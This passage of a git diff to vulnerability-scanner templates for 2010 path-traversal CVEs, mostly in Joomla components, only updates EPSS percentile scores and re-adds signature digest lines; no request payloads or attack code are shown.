max-request: 2 @@ -40,4 +40,5 @@ http: - 'LISTSERV Maestro\s+[5678]' - 'Administration Hub 9\.0-[123456780]' - 'Administration Hub [5678]' -# digest: 4b0a00483046022100b329c5cb1bbe265994f00922016236163bb4883e16b0768fd695e75fc4a444b6022100d1e1c3c467329d88383d9564c23f50b61df48e17aea186ccab67b43e9b28af39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b329c5cb1bbe265994f00922016236163bb4883e16b0768fd695e75fc4a444b6022100d1e1c3c467329d88383d9564c23f50b61df48e17aea186ccab67b43e9b28af39:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index c0c2ddf2b1..10c4b72e94 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1875 cwe-id: CWE-22 epss-score: 0.01222 - epss-percentile: 0.83822 + epss-percentile: 0.83832 cpe: cpe:2.3:a:com-property:com_properties:3.1.22-03:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204e8360374e73edc77051fbadb5360c6436de8961090618d1cb7f32c19087574e022100f0172d04df0dddfa143339ac62ba2198b45c93c472a8464cb98a9264d4ebbc18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502204e8360374e73edc77051fbadb5360c6436de8961090618d1cb7f32c19087574e022100f0172d04df0dddfa143339ac62ba2198b45c93c472a8464cb98a9264d4ebbc18:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml index 06567cfd88..15b05b0a0e 100644 --- a/http/cves/2010/CVE-2010-1878.yaml +++ b/http/cves/2010/CVE-2010-1878.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1878 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80069 + epss-percentile: 0.80076 cpe: cpe:2.3:a:blueflyingfish.no-ip:com_orgchart:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022072359ac4b30064df3cf0dad59f5326eab26ffe7193051a6e459e1aca21725931022100d4c7f1944a04a8387c284f6dba58cad5aa03ed435bc8056b06d788be09d48a2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022072359ac4b30064df3cf0dad59f5326eab26ffe7193051a6e459e1aca21725931022100d4c7f1944a04a8387c284f6dba58cad5aa03ed435bc8056b06d788be09d48a2b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index 6d43a2e9a9..d61aa13609 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1952 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83986 + epss-percentile: 0.83996 cpe: cpe:2.3:a:cmstactics:com_beeheard:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022046b635f592a54188965e0a5e5cdf68fe4733d6232e153bcd0da4de2d5b64a19f0221009eac36498a10b7b3571173996a85d949cd6949ddad76f813a4460a176548cff8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022046b635f592a54188965e0a5e5cdf68fe4733d6232e153bcd0da4de2d5b64a19f0221009eac36498a10b7b3571173996a85d949cd6949ddad76f813a4460a176548cff8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml index 1a1c713bee..3a635c5aa7 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1953 cwe-id: CWE-22 epss-score: 0.05684 - epss-percentile: 0.9249 + epss-percentile: 0.92493 cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multimap:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205a702432e1b6e25c0ebe75e1f699044bd129a8dee2cd5984eb730e24995a3a59022100d2e22ae223b11b063086aab4f2cfd6d94a19360adf4231ebaefce6dc8f65c7a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205a702432e1b6e25c0ebe75e1f699044bd129a8dee2cd5984eb730e24995a3a59022100d2e22ae223b11b063086aab4f2cfd6d94a19360adf4231ebaefce6dc8f65c7a0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1954.yaml b/http/cves/2010/CVE-2010-1954.yaml index 84cdd351cd..e19013f383 100644 --- a/http/cves/2010/CVE-2010-1954.yaml +++ b/http/cves/2010/CVE-2010-1954.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1954 cwe-id: CWE-22 epss-score: 0.05684 - epss-percentile: 0.9249 + epss-percentile: 0.92493 cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multiroot:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202609f4a1723693b4129fe03e70b84bfbc2fa1f2b2be01b7c1aa2629b82e2cdcc0221009af449722da005b8faccd029ec98177d9ad9cd5456d85a206a0d7c794b909d8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202609f4a1723693b4129fe03e70b84bfbc2fa1f2b2be01b7c1aa2629b82e2cdcc0221009af449722da005b8faccd029ec98177d9ad9cd5456d85a206a0d7c794b909d8c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index 6cd2e82fd1..066b4511d5 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1955 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86255 + epss-percentile: 0.86263 cpe: cpe:2.3:a:thefactory:com_blogfactory:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022016dbc21e850111b5b21523859c665159d8a950aba0468e2655a390c0888250df02210095022668966d51e9084b798a2953cae31dd04efd062f76c538cf54bf0affade4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022016dbc21e850111b5b21523859c665159d8a950aba0468e2655a390c0888250df02210095022668966d51e9084b798a2953cae31dd04efd062f76c538cf54bf0affade4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index 63e6a857cd..35dac20655 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1956 cwe-id: CWE-22 epss-score: 0.06055 - epss-percentile: 0.92687 + epss-percentile: 0.92692 cpe: cpe:2.3:a:thefactory:com_gadgetfactory:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220736a132e33c653e1b1c286c766d46b72cb3ef4de6885f11fd2702c693958c635022100c7513e68c3b1a4bae01d9ac045eb4b480e63cadf3356200a367a8ed83ce021c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220736a132e33c653e1b1c286c766d46b72cb3ef4de6885f11fd2702c693958c635022100c7513e68c3b1a4bae01d9ac045eb4b480e63cadf3356200a367a8ed83ce021c4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index 97749efe65..114289ae6c 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1957 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86255 + epss-percentile: 0.86263 cpe: cpe:2.3:a:thefactory:com_lovefactory:1.3.4:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201b8b4dc9f6a1f8d1acde4daa4a43ddd9eeb16c27a2cae1c474b09801c1148dae0221008c3a36c80be7819d0f9c4e6609b5dad847ae9983a59fb82df75a828058d2dcba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502201b8b4dc9f6a1f8d1acde4daa4a43ddd9eeb16c27a2cae1c474b09801c1148dae0221008c3a36c80be7819d0f9c4e6609b5dad847ae9983a59fb82df75a828058d2dcba:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index e2986e1815..3911797b94 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2010-1977 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80069 + epss-percentile: 0.80076 cpe: cpe:2.3:a:gohigheris:com_jwhmcs:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e59dd1e4f604db48416e708e4f13368dd9e0a1c4c48e5d42cb723860c111187c022100b38779e7b48b38e51eabf20e025d5b2ef69f75c9e0bd984094fdbc0a947420da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e59dd1e4f604db48416e708e4f13368dd9e0a1c4c48e5d42cb723860c111187c022100b38779e7b48b38e51eabf20e025d5b2ef69f75c9e0bd984094fdbc0a947420da:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml index a6c16b38b8..091770e01c 100644 --- a/http/cves/2010/CVE-2010-1979.yaml +++ b/http/cves/2010/CVE-2010-1979.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1979 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80069 + epss-percentile: 0.80076 cpe: cpe:2.3:a:affiliatefeeds:com_datafeeds:build_880:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d123bca3ea0c94069a1138f53357b2baa6b263f0730271aaf62c6b9e895e8e8202210088c808c3caa28441bae5d0ff2cb5a38eec06e4c7360b8271379cca1bc03ee6e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d123bca3ea0c94069a1138f53357b2baa6b263f0730271aaf62c6b9e895e8e8202210088c808c3caa28441bae5d0ff2cb5a38eec06e4c7360b8271379cca1bc03ee6e9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1980.yaml b/http/cves/2010/CVE-2010-1980.yaml index 50cf3b1d08..b2e8bebe6e 100644 --- a/http/cves/2010/CVE-2010-1980.yaml +++ b/http/cves/2010/CVE-2010-1980.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1980 cwe-id: CWE-22 epss-score: 0.02401 - epss-percentile: 0.8872 + epss-percentile: 0.88729 cpe: cpe:2.3:a:roberto_aloi:com_joomlaflickr:1.0.3:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f52fea369742b587bdeb6a4510001100bfca7bee095024dbb19748d52f63287a022024b5ff93ad6e4b85602a8fe52b65bb68168941eab51b8c6acb6a82ce853f6b86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100f52fea369742b587bdeb6a4510001100bfca7bee095024dbb19748d52f63287a022024b5ff93ad6e4b85602a8fe52b65bb68168941eab51b8c6acb6a82ce853f6b86:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml index 9cea9a5857..af4ccdd713 100644 --- a/http/cves/2010/CVE-2010-1981.yaml +++ b/http/cves/2010/CVE-2010-1981.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1981 cwe-id: CWE-22 epss-score: 0.00656 - epss-percentile: 0.77228 + epss-percentile: 0.7724 cpe: cpe:2.3:a:fabrikar:fabrik:2.0:*:*:*:*:joomla\!:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022009262c775a76c0a8e1e22d1f47f1ee9ad2211816b80ac78edde7115fba73b47002202eea95bb61b195e5f627156ec4a595ec6d6ea6f93c4b2831ba081e76aca1c150:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022009262c775a76c0a8e1e22d1f47f1ee9ad2211816b80ac78edde7115fba73b47002202eea95bb61b195e5f627156ec4a595ec6d6ea6f93c4b2831ba081e76aca1c150:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml index 69d9fde3b0..721e56f1db 100644 --- a/http/cves/2010/CVE-2010-1982.yaml +++ b/http/cves/2010/CVE-2010-1982.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2010-1982 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73105 + epss-percentile: 0.7312 cpe: cpe:2.3:a:joomlart:com_javoice:2.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203aea5daf7fa66ab3640f96e684a914df8a9f61b127f2c518ad4b9ba1c0f77bc1022100c2ec951fa58c94ebd5a798dbaf58a7e739b47a39d15e97c413561c6d9e34cda9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203aea5daf7fa66ab3640f96e684a914df8a9f61b127f2c518ad4b9ba1c0f77bc1022100c2ec951fa58c94ebd5a798dbaf58a7e739b47a39d15e97c413561c6d9e34cda9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml index e63c5e2535..e7569c5211 100644 --- a/http/cves/2010/CVE-2010-1983.yaml +++ b/http/cves/2010/CVE-2010-1983.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1983 cwe-id: CWE-22 epss-score: 0.01815 - epss-percentile: 0.86842 + epss-percentile: 0.86848 cpe: cpe:2.3:a:redcomponent:com_redtwitter:1.0b8:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d6f45e6495c5d6162878a730f62375b52c284a3f3553b11bafa82cfdd0ac2c32022017959005b160947a5fb48ae235e11a40527018a48deb3abb42a1eba5a86874c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d6f45e6495c5d6162878a730f62375b52c284a3f3553b11bafa82cfdd0ac2c32022017959005b160947a5fb48ae235e11a40527018a48deb3abb42a1eba5a86874c0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2033.yaml b/http/cves/2010/CVE-2010-2033.yaml index f2684609d0..a0f86337c6 100644 --- a/http/cves/2010/CVE-2010-2033.yaml +++ b/http/cves/2010/CVE-2010-2033.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2010-2033 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80069 + epss-percentile: 0.80076 cpe: cpe:2.3:a:percha:com_perchacategoriestree:0.6:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d41f436574119575e273ff2409cedef0c3d436ee103513cf84ed17a467608c2b022100b5f61bd42557f57eb5213c5963c7dc202a28b86a099324c08d3ac29acbb7652c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d41f436574119575e273ff2409cedef0c3d436ee103513cf84ed17a467608c2b022100b5f61bd42557f57eb5213c5963c7dc202a28b86a099324c08d3ac29acbb7652c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2034.yaml b/http/cves/2010/CVE-2010-2034.yaml index e675f2d664..5d8d85ebaa 100644 --- a/http/cves/2010/CVE-2010-2034.yaml +++ b/http/cves/2010/CVE-2010-2034.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2034 cwe-id: CWE-22 epss-score: 0.00718 - epss-percentile: 0.78419 + epss-percentile: 0.78431 cpe: cpe:2.3:a:percha:com_perchaimageattach:1.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210088c32af5b4a6b83ed97a60555f0f466b5644fc508667233e490747caf8e2a6cc022100f5828722b6afbc7c4db720842ade90f2597751d59e101496aee12ccacf442353:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210088c32af5b4a6b83ed97a60555f0f466b5644fc508667233e490747caf8e2a6cc022100f5828722b6afbc7c4db720842ade90f2597751d59e101496aee12ccacf442353:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index bddbb7a022..1c0bd28e4f 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2035 cwe-id: CWE-22 epss-score: 0.00718 - epss-percentile: 0.78419 + epss-percentile: 0.78431 cpe: cpe:2.3:a:percha:com_perchagallery:1.6:beta:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402204ea00a029249988d909d3ca3d899bbfac43d6de2377e3ca2f9f2b4e16cf4861102207aacde612b6bb1f9e52141e8420c5d9fa32d66213071c8ad7fad1641541de251:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204ea00a029249988d909d3ca3d899bbfac43d6de2377e3ca2f9f2b4e16cf4861102207aacde612b6bb1f9e52141e8420c5d9fa32d66213071c8ad7fad1641541de251:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index d997b85289..aea33df0e3 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2036 cwe-id: CWE-22 epss-score: 0.00718 - epss-percentile: 0.78419 + epss-percentile: 0.78431 cpe: cpe:2.3:a:percha:com_perchafieldsattach:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100be5781f1ab9e0bc8c86215f610a80a2c045dad202bc9600a41a1f2d2275fc56c0221009063a819d9f58284dbe335142ea78d9ddadf8e6364441a48a18fde19956305e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100be5781f1ab9e0bc8c86215f610a80a2c045dad202bc9600a41a1f2d2275fc56c0221009063a819d9f58284dbe335142ea78d9ddadf8e6364441a48a18fde19956305e8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index a05c1ba090..8cea85ca95 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2037 cwe-id: CWE-22 epss-score: 0.00718 - epss-percentile: 0.78419 + epss-percentile: 0.78431 cpe: cpe:2.3:a:percha:com_perchadownloadsattach:1.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022044315b36a892cc1181f228d70b026c3282cec9552b817b50e20b21dc03c2b69c0221008bc2580a6513232b9458d5516a49e45eaeb51c76ab4fdcdc0c74af5a235e8663:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022044315b36a892cc1181f228d70b026c3282cec9552b817b50e20b21dc03c2b69c0221008bc2580a6513232b9458d5516a49e45eaeb51c76ab4fdcdc0c74af5a235e8663:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2045.yaml b/http/cves/2010/CVE-2010-2045.yaml index 0651855b39..6aa9d40296 100644 --- a/http/cves/2010/CVE-2010-2045.yaml +++ b/http/cves/2010/CVE-2010-2045.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2045 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86255 + epss-percentile: 0.86263 cpe: cpe:2.3:a:dionesoft:com_dioneformwizard:1.0.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402206bbca93b949a410b24aafbc080925392ec68820eaa4e88e4df0d058ac9c7a7cb02205e3af469d2ff9ceddd1abc5684e760e5ff9a8e5ce156c35d7f75edbc442c49d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402206bbca93b949a410b24aafbc080925392ec68820eaa4e88e4df0d058ac9c7a7cb02205e3af469d2ff9ceddd1abc5684e760e5ff9a8e5ce156c35d7f75edbc442c49d4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index b2334e9867..dcdb577c0e 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-2050 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90512 + epss-percentile: 0.90518 cpe: cpe:2.3:a:m0r0n:com_mscomment:0.8.0:b:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220130b9443ac967148ef71541179113012a13c04f86e1f75015fb3f20ec0b6f9ce022100d749d5846b68e04eae01c779e092558cdd2dc4b3bb84ccf4370048f079f3f4a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220130b9443ac967148ef71541179113012a13c04f86e1f75015fb3f20ec0b6f9ce022100d749d5846b68e04eae01c779e092558cdd2dc4b3bb84ccf4370048f079f3f4a7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml index 6a5f1a3049..22debfa7da 100644 --- a/http/cves/2010/CVE-2010-2122.yaml +++ b/http/cves/2010/CVE-2010-2122.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-2122 cwe-id: CWE-22 epss-score: 0.01806 - epss-percentile: 0.86814 + epss-percentile: 0.86819 cpe: cpe:2.3:a:joelrowley:com_simpledownload:0.9.5:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d7ec4e12156e282b80e8fb2be695fe229511c23df5354241297041bc67b51931022003e16bc10a80394fd41a6351ce85b932dc761590c505c7f252d59211b26e0939:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d7ec4e12156e282b80e8fb2be695fe229511c23df5354241297041bc67b51931022003e16bc10a80394fd41a6351ce85b932dc761590c505c7f252d59211b26e0939:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2128.yaml b/http/cves/2010/CVE-2010-2128.yaml index 4fd020b0d3..7fefc2f378 100644 --- a/http/cves/2010/CVE-2010-2128.yaml +++ b/http/cves/2010/CVE-2010-2128.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2128 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83986 + epss-percentile: 0.83996 cpe: cpe:2.3:a:harmistechnology:com_jequoteform:1.0:b1:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ec838d4b6c965e7b8a9d0820f8cf62c6ed69b796587343e8469e97c658dc2749022003c90aeaf54ba8903688839eaf3faa56b237bf6fba4db0b169110d0dbd82d4aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ec838d4b6c965e7b8a9d0820f8cf62c6ed69b796587343e8469e97c658dc2749022003c90aeaf54ba8903688839eaf3faa56b237bf6fba4db0b169110d0dbd82d4aa:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2259.yaml b/http/cves/2010/CVE-2010-2259.yaml index 0b969b2075..08e58fdc96 100644 --- a/http/cves/2010/CVE-2010-2259.yaml +++ b/http/cves/2010/CVE-2010-2259.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2259 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86255 + epss-percentile: 0.86263 cpe: cpe:2.3:a:tamlyncreative:com_bfsurvey_profree:1.2.6:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008521d91eb78cbddb122b1d595771d5ec8256fba7c50123876642c73d5bc6b08002201e1c43b648341e8edfc3eed9dee0e429c1f2a2a2c5de46bdecd75f210e7ecbe7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008521d91eb78cbddb122b1d595771d5ec8256fba7c50123876642c73d5bc6b08002201e1c43b648341e8edfc3eed9dee0e429c1f2a2a2c5de46bdecd75f210e7ecbe7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index 10b7842c6e..eda64a5a5e 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2307 cwe-id: CWE-22 epss-score: 0.00832 - epss-percentile: 0.80139 + epss-percentile: 0.80145 cpe: cpe:2.3:h:motorola:surfboard_sbv6120e:sbv6x2x-1.0.0.5-scm-02-shpc:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402207878441ebd99b9ed74b24b4a4f41ed74f7016a5e390403adb2add467c3f3ec10022047852ed306f2ba524cecfbe6ca09ccb77fb17ac986b3f11690049fa16422c293:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207878441ebd99b9ed74b24b4a4f41ed74f7016a5e390403adb2add467c3f3ec10022047852ed306f2ba524cecfbe6ca09ccb77fb17ac986b3f11690049fa16422c293:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index 321062e2d1..2ed3a1421b 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2507 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86255 + epss-percentile: 0.86263 cpe: cpe:2.3:a:masselink:com_picasa2gallery:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022045161650f2c27d5b13e06cacd6e7674b0517fbaa2d1eb1d94edfde3086024912022100a4dc1136ecfc019b6d9ed4dd64eae1348048a7fde8f6de26dda94d8100b7cace:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022045161650f2c27d5b13e06cacd6e7674b0517fbaa2d1eb1d94edfde3086024912022100a4dc1136ecfc019b6d9ed4dd64eae1348048a7fde8f6de26dda94d8100b7cace:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml index 2e6f8f19b7..f7ff9c6b8f 100644 --- a/http/cves/2010/CVE-2010-2680.yaml +++ b/http/cves/2010/CVE-2010-2680.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2680 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80069 + epss-percentile: 0.80076 cpe: cpe:2.3:a:harmistechnology:com_jesectionfinder:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eceb5f2f7cd1d7d4c964293451ad7db1caa6304e732455d765d9c75ae740aee9022100f842a1e87770a29fa134f2ab1e2b4a861f3a165fc23c2958f89bf1d8ba4426fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100eceb5f2f7cd1d7d4c964293451ad7db1caa6304e732455d765d9c75ae740aee9022100f842a1e87770a29fa134f2ab1e2b4a861f3a165fc23c2958f89bf1d8ba4426fa:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2682.yaml b/http/cves/2010/CVE-2010-2682.yaml 